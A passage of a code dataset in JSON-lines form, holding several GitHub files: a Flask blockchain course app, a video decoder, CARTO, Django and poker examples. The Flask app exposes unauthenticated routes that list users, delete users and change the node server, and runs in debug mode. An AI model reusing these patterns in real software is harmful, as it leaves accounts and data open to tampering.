not current_user.is_admin:\n return redirect(url_for('index'))\n\n return render_template(\"admin/delete_user.html\")\n\n@app.route(\"/getSellers\", methods=[\"GET\"])\ndef getSellers():\n return jsonify({\n \"users\": User.getUsers()\n })\n\n@app.route(\"/deleteAuser\", methods=[\"POST\"])\ndef deleteAuser():\n content = request.get_json()\n\n if not User.deleteUser(content[\"email\"]):\n return \"Error\", 400\n return \"User Deleted\", 200\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n\n form = LoginForm()\n\n if form.validate_on_submit():\n\n userInfo = User.get_by_email(form.email.data, form.password.data)\n\n if userInfo is not None:\n\n user = User(userInfo.get('user_id'), userInfo.get('name'), userInfo.get('email'), userInfo.get('password'), userInfo.get('is_admin'))\n user.set_object(user)\n\n login_user(user, remember=form.remember_me.data)\n\n next_page = request.args.get('next')\n\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n\n return redirect(next_page)\n return render_template('login_form.html', form=form)\n\n@app.route('/logout')\ndef logout():\n\n mine = \"{}/mine\".format(CONNECTED_NODE_ADDRESS)\n requests.get(mine)\n\n logout_user()\n return redirect(url_for('index'))\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.get_by_id(user_id)\n\ndef timestamp_to_string(epoch_time):\n return datetime.datetime.fromtimestamp(epoch_time).strftime('%a, %B %d, %Y %H:%M')\n\n@app.route('/defServer', methods=['POST'])\ndef defServer():\n global CONNECTED_NODE_ADDRESS\n content = request.get_json()\n if \"server\" not in content:\n return \"Error\", 400\n CONNECTED_NODE_ADDRESS = content[\"server\"]\n print(CONNECTED_NODE_ADDRESS)\n return \"Success\", 200\n\n\n@app.route('/getServer', methods=['GET'])\ndef getServer():\n return jsonify({\n \"server\":CONNECTED_NODE_ADDRESS\n })\n\napp.run(debug=True)\n", "repo_name": "iabrilvzqz/Criptografia", "sub_path": "Proyecto_Final/app/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 6365, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 19, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 54, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 59, "usage_type": "call"}, {"api_name": "flask_login.current_user.name", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 67, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 79, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 57, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 96, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 82, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_admin", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 105, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 106, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 108, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 101, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_admin", "line_number": 113, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 114, "usage_type": "call"}, {"api_name": "forms.SignupForm", "line_number": 116, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 124, "usage_type": "call"}, {"api_name": "models.User", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "werkzeug.urls.url_parse", "line_number": 136, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 137, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 140, "usage_type": "call"}, {"api_name": "flask_login.current_user.is_admin", "line_number": 145, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 145, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 148, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 152, "usage_type": "call"}, {"api_name": "models.User.getUsers", "line_number": 153, "usage_type": "call"}, {"api_name": "models.User", "line_number": 153, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 158, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 158, "usage_type": "name"}, {"api_name": "models.User.deleteUser", "line_number": 160, "usage_type": "call"}, {"api_name": "models.User", "line_number": 160, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 166, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 166, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 167, "usage_type": "call"}, {"api_name": "forms.LoginForm", "line_number": 169, "usage_type": "call"}, {"api_name": "models.User.get_by_email", "line_number": 173, "usage_type": "call"}, {"api_name": "models.User", "line_number": 173, "usage_type": "name"}, {"api_name": "models.User", "line_number": 177, "usage_type": "call"}, {"api_name": "flask_login.login_user", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 182, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 182, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 182, "usage_type": "name"}, {"api_name": "werkzeug.urls.url_parse", "line_number": 184, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 185, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 188, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 194, "usage_type": "call"}, {"api_name": "flask_login.logout_user", "line_number": 196, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 197, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 197, "usage_type": "call"}, {"api_name": "models.User.get_by_id", "line_number": 201, "usage_type": "call"}, {"api_name": "models.User", "line_number": 201, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 204, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 204, "usage_type": "attribute"}, {"api_name": "flask.request.get_json", "line_number": 209, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 209, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 219, "usage_type": "call"}]} +{"seq_id": "1550574021", "text": "import cv2\nimport numpy as np\n\n\nhead_codec_tag = \"16KC\"\nhead_tag_idx = (0, 4)\nhead_frame_count_idx = (4, 8)\nhead_frame_rate_idx = (8, 10)\nhead_width_idx = (10, 14)\nhead_height_idx = (14, 18)\nhead_object_number_idx = (18, 22)\n\nbytes_in_head = 18 # Without the number of objects 18, with it 22 bytes\nbytes_in_frame_data = 26\n\nframe_count = None\nframe_rate = None\nframe_width = None\nframe_height = None\n\n\n\n\n\ndef decode_head(bytes_array):\n\tglobal frame_count\n\tglobal frame_rate\n\tglobal frame_width\n\tglobal frame_height\n\t\n\ttag = bytes_array[head_tag_idx[0]:head_tag_idx[1]].decode(\"utf-8\")\n\tif tag != head_codec_tag:\n\t\traise Exception(\"The input file is not a 16k codec video (16KC)\")\n\n\tframe_count = int.from_bytes(bytes_array[head_frame_count_idx[0] : head_frame_count_idx[1]], byteorder='big')\n\tframe_rate = int.from_bytes(bytes_array[head_frame_rate_idx[0] : head_frame_rate_idx[1]], byteorder='big')\n\tframe_width = int.from_bytes(bytes_array[head_width_idx[0] : head_width_idx[1]], byteorder='big')\n\tframe_height = int.from_bytes(bytes_array[head_height_idx[0] : head_height_idx[1]], byteorder='big')\n\t# total_object_number = int.from_bytes(bytes[head_object_number_idx[0] : head_object_number_idx[1]], byteorder='little')\n\n\treturn (frame_count, frame_rate, frame_width, frame_height)\n\n\n\n\ndef decode_background(bytes_array):\n\tglobal frame_width\n\tglobal frame_height\n\n\tif frame_height is None or frame_width is None:\n\t\traise Exception(\"Something went wrong at decode_background() ==> heigth or width is None\")\n\n\tnp_arr = np.fromstring(bytes_array, np.uint8)\n\tbackground = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)\n\treturn background\n\n\ndef decode_texture_atlas(bytes_array):\n\tnp_arr = np.fromstring(bytes_array, np.uint8)#.reshape(frame_height, frame_width, 3)\n\ttexture_atlas = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)\n\treturn texture_atlas\n\n\n\n# MAIN METHOD\n\ndef decode_file(filename):\n\tglobal frame_count\n\tglobal frame_rate\n\tglobal frame_width\n\tglobal frame_height\n\n\tfile = filename\n\n\tf = open(file, 'rb')\n\n\t# Read head\n\tbyte_arr = f.read(bytes_in_head) \n\tframe_count, frame_rate, frame_width, frame_height = decode_head(byte_arr)\n\n\t# Read the background\n\tbackground_size = int.from_bytes(f.read(4), byteorder='big')\n\tbyte_arr = f.read(background_size)\n\tbackground = decode_background(byte_arr)\n\n\n\t# Read frames\n\tfor i in range(0,frame_count-1):\n\t\tcanvas = np.array(background)\n\n\t\t# Read frame data\n\t\tframe_data_element_count = int.from_bytes(f.read(4), byteorder='big')\n\t\tframe_data = []\n\t\tfor e in range(0, frame_data_element_count):\n\t\t\tframe_data_row = f.read(bytes_in_frame_data)\n\t\t\tobj_id = int.from_bytes(frame_data_row[0:2], byteorder='big')\n\t\t\tobj_tex_x = int.from_bytes(frame_data_row[2:6], byteorder='big')\n\t\t\tobj_tex_y = int.from_bytes(frame_data_row[6:10], byteorder='big')\n\t\t\tobj_tex_w = int.from_bytes(frame_data_row[10:14], byteorder='big')\n\t\t\tobj_tex_h = int.from_bytes(frame_data_row[14:18], byteorder='big')\n\t\t\tobj_v_x = int.from_bytes(frame_data_row[18:22], byteorder='big')\n\t\t\tobj_v_y = int.from_bytes(frame_data_row[22:26], byteorder='big')\n\t\t\tframe_data.append([obj_id, obj_tex_x, obj_tex_y, obj_tex_w, obj_tex_h, obj_v_x, obj_v_y])\n\n\t\t# Read the texture atlas\n\t\ttexture_atlas_size = int.from_bytes(f.read(4), byteorder='big')\n\t\tbyte_arr = f.read(texture_atlas_size)\n\t\ttexture_atlas = decode_texture_atlas(byte_arr)\n\n\t\t# Add objects to the canvas\n\t\tfor e in frame_data:\n\t\t\tv_coords = (e[5], e[6])\n\t\t\tw = e[3]\n\t\t\th = e[4]\n\t\t\ttex_coords = (e[1], e[2])\n\t\t\tcanvas[v_coords[0]:v_coords[0]+h, v_coords[1]:v_coords[1]+w] = texture_atlas[tex_coords[0]:tex_coords[0]+h, tex_coords[1]:tex_coords[1]+w]\n\t\tcv2.imshow(\"img\", canvas)\n\t\tcv2.waitKey(30)\n\tcv2.destroyAllWindows()\n\n\tf.close()\n\n", "repo_name": "MEC402/16kcPlayer", "sub_path": "decoder.py", "file_name": "decoder.py", "file_ext": "py", "file_size_in_byte": 3692, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.fromstring", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 53, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.fromstring", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 118, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "70661321794", "text": "import argparse\nimport os\nimport sys\nimport logging\nimport pandas as pd\n\nfrom carto.auth import APIKeyAuthClient\nfrom carto.sql import SQLClient\nfrom carto.sql import CopySQLClient\n\n# Logger (better than print)\nlogging.basicConfig(\n level=logging.INFO,\n format=' %(asctime)s - %(levelname)s - %(message)s',\n datefmt='%I:%M:%S %p')\nlogger = logging.getLogger()\n\n\n# set input arguments\nparser = argparse.ArgumentParser(description='Example of CopySQLClient usage with COPY feature and pandas (file-based interface)')\n\nparser.add_argument('--base_url', type=str, dest='CARTO_BASE_URL',\n default=os.environ.get('CARTO_API_URL', ''),\n help='Set the base URL. For example:' +\n ' https://username.carto.com/ ' +\n '(defaults to env variable CARTO_API_URL)')\n\nparser.add_argument('--api_key', dest='CARTO_API_KEY',\n default=os.environ.get('CARTO_API_KEY', ''),\n help='Api key of the account' +\n ' (defaults to env variable CARTO_API_KEY)')\n\n\nargs = parser.parse_args()\n\n# Set authentification to CARTO\nif args.CARTO_BASE_URL and args.CARTO_API_KEY:\n auth_client = APIKeyAuthClient(\n args.CARTO_BASE_URL, args.CARTO_API_KEY)\nelse:\n logger.error('You need to provide valid credentials, run with '\n '-h parameter for details')\n sys.exit(1)\n\n# Create and cartodbfy a table\nsqlClient = SQLClient(auth_client)\nsqlClient.send(\"\"\"\n CREATE TABLE IF NOT EXISTS copy_example (\n the_geom geometry(Geometry,4326),\n name text,\n age integer\n )\n \"\"\")\nsqlClient.send(\"SELECT CDB_CartodbfyTable(current_schema, 'copy_example')\")\n\ncopyClient = CopySQLClient(auth_client)\n\n# COPY FROM example\nlogger.info(\"COPY'ing FROM file...\")\nquery = ('COPY copy_example (the_geom, name, age) '\n 'FROM stdin WITH (FORMAT csv, HEADER true)')\nresult = copyClient.copyfrom_file_path(query, 'files/copy_from.csv')\nlogger.info('result = %s' % result)\n\n# COPY TO example with pandas DataFrame\nlogger.info(\"COPY'ing TO pandas DataFrame...\")\nquery = 'COPY copy_example TO stdout WITH (FORMAT csv, HEADER true)'\nresult = copyClient.copyto_stream(query)\ndf = pd.read_csv(result)\nlogger.info(df.head())\n\n# Truncate the table to make this example repeatable\nsqlClient.send('TRUNCATE TABLE copy_example RESTART IDENTITY')\n", "repo_name": "CartoDB/carto-python", "sub_path": "examples/copy_and_pandas_example.py", "file_name": "copy_and_pandas_example.py", "file_ext": "py", "file_size_in_byte": 2373, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 154, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 13, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 20, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 23, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 29, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "carto.auth.APIKeyAuthClient", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "carto.sql.SQLClient", "line_number": 46, "usage_type": "call"}, {"api_name": "carto.sql.CopySQLClient", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "70063392195", "text": "from typing import List\n\nfrom django.http import JsonResponse\n\nfrom modules.tweets.models import Tweet, ResponseUserLikedTweet\nfrom modules.tweets.serializers import (\n TweetPublicSerializer,\n UserTweetPublicLikesSerializer,\n)\nfrom modules.users.serializers import UserPublicInfoSerializer\nfrom modules.users.models import User\n\nfrom rest_framework import generics, status\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework_simplejwt.tokens import AccessToken\n\n\nclass UserBaseApi(generics.GenericAPIView):\n \"\"\"base class for user api views\"\"\"\n\n permission_classes = (IsAuthenticated,)\n serializer_class = None\n\n def get_queryset(self) -> User:\n pass\n\n def list(self, request, username: str, *args, **kwargs):\n \"\"\"return list of user tweet with pagination\"\"\"\n try:\n # serialize data from database and paginate\n # by default, paginate by 10\n queryset = self.filter_queryset(self.get_queryset(username))\n serializer = self.get_serializer(queryset, many=True)\n\n return JsonResponse(serializer.data, status=status.HTTP_200_OK, safe=False)\n except Exception as ex:\n return JsonResponse({\"detail\": ex.args}, status=status.HTTP_400_BAD_REQUEST)\n\n def retrive_token(self, request) -> AccessToken:\n \"\"\"get token from authorization header\"\"\"\n tokens = request.META.get(\"HTTP_AUTHORIZATION\", \" \").split()[-1]\n access = AccessToken(tokens)\n return access\n\n\nclass UserPublicInfoVuew(UserBaseApi):\n \"\"\"view for user public info\"\"\"\n\n serializer_class = UserPublicInfoSerializer\n\n def get_queryset(self, username: str) -> User:\n \"\"\"get user querset\"\"\"\n return User.objects.get(username=username, is_active=True)\n\n def get(self, request, username: str, *args, **kwargs):\n \"\"\"get user public info\"\"\"\n try:\n queryset = self.get_queryset(username)\n serializer = self.get_serializer(queryset)\n return JsonResponse(serializer.data, status=status.HTTP_200_OK, safe=False)\n except Exception as ex:\n return JsonResponse({\"detail\": ex.args}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserPublicTweetView(UserBaseApi):\n \"\"\"user public tweet api views\n methods: get, delete\n \"\"\"\n\n serializer_class = TweetPublicSerializer\n\n def get_queryset(self, username: str) -> List[Tweet]:\n \"\"\"return list of user tweet\"\"\"\n return (\n User.objects.get(username=username, is_active=True)\n .tweets.all()\n .order_by(\"-created_at\")\n )\n\n def get(self, request, username: str, *args, **kwargs):\n \"\"\"return list of user tweeted tweets\"\"\"\n return self.list(request, username, *args, **kwargs)\n\n\nclass UserPublicMediaView(UserBaseApi):\n \"\"\"user public tweet medias api views\n methods: get\n \"\"\"\n\n serializer_class = TweetPublicSerializer\n\n def get_queryset(self, username: str) -> List[Tweet]:\n \"\"\"return list of user tweet\"\"\"\n return (\n User.objects.get(username=username, is_active=True)\n .tweets.all()\n .exclude(pictures=\"\")\n .order_by(\"-created_at\")\n )\n\n def get(self, request, username: str, *args, **kwargs):\n \"\"\"return list of user tweeted medias\"\"\"\n return self.list(request, username, *args, **kwargs)\n\n\nclass UserPublicReplyView(UserBaseApi):\n \"\"\"user public tweet replies api views\n methods: get\n \"\"\"\n\n serializer_class = TweetPublicSerializer\n\n def get_queryset(self, username: str) -> List[Tweet]:\n \"\"\"return list of user tweet\"\"\"\n return (\n User.objects.get(username=username, is_active=True)\n .commented_tweets.all()\n .order_by(\"-created_at\")\n )\n\n def get(self, request, username: str, *args, **kwargs):\n \"\"\"return list of user tweeted replies\"\"\"\n return self.list(request, username, *args, **kwargs)\n\n\nclass UserPublicLikesView(UserBaseApi):\n \"\"\"user public tweet likes api views\n methods: get\n \"\"\"\n\n serializer_class = UserTweetPublicLikesSerializer\n\n def list(self, request, username: str, *args, **kwargs):\n \"\"\"return list of user tweet with pagination\"\"\"\n try:\n # serialize data from database and paginate\n # by default, paginate by 10\n queryset = self.filter_queryset(self.get_queryset(username))\n serializer = self.get_serializer(\n queryset, many=True, context={\"request\": request}\n )\n\n return JsonResponse(serializer.data, status=status.HTTP_200_OK, safe=False)\n except Exception as ex:\n return JsonResponse({\"detail\": ex.args}, status=status.HTTP_400_BAD_REQUEST)\n\n def get_queryset(self, username: str) -> List[ResponseUserLikedTweet]:\n \"\"\"return list of user tweet\"\"\"\n return (\n User.objects.get(username=username, is_active=True)\n .liked_tweet.all()\n .order_by(\"-created_at\")\n )\n\n def get(self, request, username: str, *args, **kwargs):\n \"\"\"return list of user tweeted replies\"\"\"\n return self.list(request, username, *args, **kwargs)\n\n\nuser_info = UserPublicInfoVuew.as_view()\nuser_tweets = UserPublicTweetView.as_view()\nuser_medias = UserPublicMediaView.as_view()\nuser_replies = UserPublicReplyView.as_view()\nuser_likes = UserPublicLikesView.as_view()\n", "repo_name": "jirenmaa/twitter-clone", "sub_path": "modules/users/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 5462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.generics.GenericAPIView", "line_number": 18, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 21, "usage_type": "name"}, {"api_name": "modules.users.models.User", "line_number": 24, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 35, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 37, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 37, "usage_type": "name"}, {"api_name": "rest_framework_simplejwt.tokens.AccessToken", "line_number": 42, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.tokens.AccessToken", "line_number": 39, "usage_type": "name"}, {"api_name": "modules.users.serializers.UserPublicInfoSerializer", "line_number": 49, "usage_type": "name"}, {"api_name": "modules.users.models.User.objects.get", "line_number": 53, "usage_type": "call"}, {"api_name": "modules.users.models.User.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "modules.users.models.User", "line_number": 53, "usage_type": "name"}, {"api_name": "modules.users.models.User", "line_number": 51, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 60, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 60, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 60, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 62, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 62, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 62, "usage_type": "name"}, {"api_name": "modules.tweets.serializers.TweetPublicSerializer", "line_number": 70, "usage_type": "name"}, {"api_name": "modules.users.models.User.objects.get", "line_number": 75, "usage_type": "call"}, {"api_name": "modules.users.models.User.objects", "line_number": 75, "usage_type": "attribute"}, {"api_name": "modules.users.models.User", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 72, "usage_type": "name"}, {"api_name": "modules.tweets.models.Tweet", "line_number": 72, "usage_type": "name"}, {"api_name": "modules.tweets.serializers.TweetPublicSerializer", "line_number": 90, "usage_type": "name"}, {"api_name": "modules.users.models.User.objects.get", "line_number": 95, "usage_type": "call"}, {"api_name": "modules.users.models.User.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "modules.users.models.User", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 92, "usage_type": "name"}, {"api_name": "modules.tweets.models.Tweet", "line_number": 92, "usage_type": "name"}, {"api_name": "modules.tweets.serializers.TweetPublicSerializer", "line_number": 111, "usage_type": "name"}, {"api_name": "modules.users.models.User.objects.get", "line_number": 116, "usage_type": "call"}, {"api_name": "modules.users.models.User.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "modules.users.models.User", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 113, "usage_type": "name"}, {"api_name": "modules.tweets.models.Tweet", "line_number": 113, "usage_type": "name"}, {"api_name": "modules.tweets.serializers.UserTweetPublicLikesSerializer", "line_number": 131, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 143, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 143, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 143, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 145, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 145, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 145, "usage_type": "name"}, {"api_name": "modules.users.models.User.objects.get", "line_number": 150, "usage_type": "call"}, {"api_name": "modules.users.models.User.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "modules.users.models.User", "line_number": 150, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 147, "usage_type": "name"}, {"api_name": "modules.tweets.models.ResponseUserLikedTweet", "line_number": 147, "usage_type": "name"}]} +{"seq_id": "24735425907", "text": "from learner import Table\nimport matplotlib.pyplot as plt\nfrom learner.templates import simulate, BasicPlayer\nfrom sklearn.ensemble import GradientBoostingRegressor\n\nif __name__ == '__main__':\n\n # 建立Table,小盲注为1,大盲注为2,最大下注为200\n # Create a table with a small blind of 1, a big blind of 2 and a maximum bet of 200\n t = Table(smallBlind=1, bigBlind=2, maxBuyIn=200)\n\n # 建立player\n # Create player\n players = []\n\n # 建立4个玩家\n # Create 4 players\n for i in range(4):\n r = GradientBoostingRegressor()\n name = 'Player ' + str(i+1)\n p = BasicPlayer(name=name, reg=r, bankroll=10**6, nRaises=10, rFactor=.7, memory=10**5)\n players.append(p)\n\n for p in players:\n t.addPlayer(p)\n\n # 模拟20000手并保存每个玩家的bankroll\n # Simulate 20,000 hands and save bankroll for each player\n\n bankrolls = simulate(t, nHands=20000, nTrain=0, nBuyIn=10)\n\n # 可视化\n # Visualization\n for i in range(4):\n bankroll = bankrolls[i]\n plt.plot(range(len(bankroll)), bankroll, label=players[i].getName())\n plt.title('Player bankroll vs Hands played') \n plt.xlabel('Hands played')\n plt.ylabel('Player bankroll/wealth')\n plt.legend(loc='upper left')\n plt.show()\n", "repo_name": "GkiwiXiao/Poeker", "sub_path": "code/poker/bankroll_demo.py", "file_name": "bankroll_demo.py", "file_ext": "py", "file_size_in_byte": 1304, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "learner.Table", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 19, "usage_type": "call"}, {"api_name": "learner.templates.BasicPlayer", "line_number": 21, "usage_type": "call"}, {"api_name": "learner.templates.simulate", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "8730170569", "text": "from django.conf.urls import patterns, include, url\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n\n\n\nurlpatterns = patterns('',\n url(r'^api/1/', include('zooapi.urls')),\n url(r'^', include('zoo.urls')),\n)\n\nurlpatterns += staticfiles_urlpatterns()", "repo_name": "perldev/zoo", "sub_path": "web/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 277, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.staticfiles.urls.staticfiles_urlpatterns", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "31936507483", "text": "import networkx as nx\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\n\r\ndef create_graph(G, node, pos={}, x=0, y=0, layer=1):\r\n pos.update({node.val: (x, y)})\r\n if node.left:\r\n G.add_edge(node.val, node.left.val)\r\n l_x, l_y = x - 10 / 2 ** layer, y - 1\r\n l_layer = layer + 1\r\n create_graph(G, node.left, x=l_x, y=l_y, pos=pos, layer=l_layer)\r\n if node.right:\r\n G.add_edge(node.val, node.right.val)\r\n r_x, r_y = x + 10 / 2 ** layer, y - 1\r\n r_layer = layer + 1\r\n create_graph(G, node.right, x=r_x, y=r_y, pos=pos, layer=r_layer)\r\n return (G, pos)\r\n\r\n\r\ndef draw(node):\r\n graph = 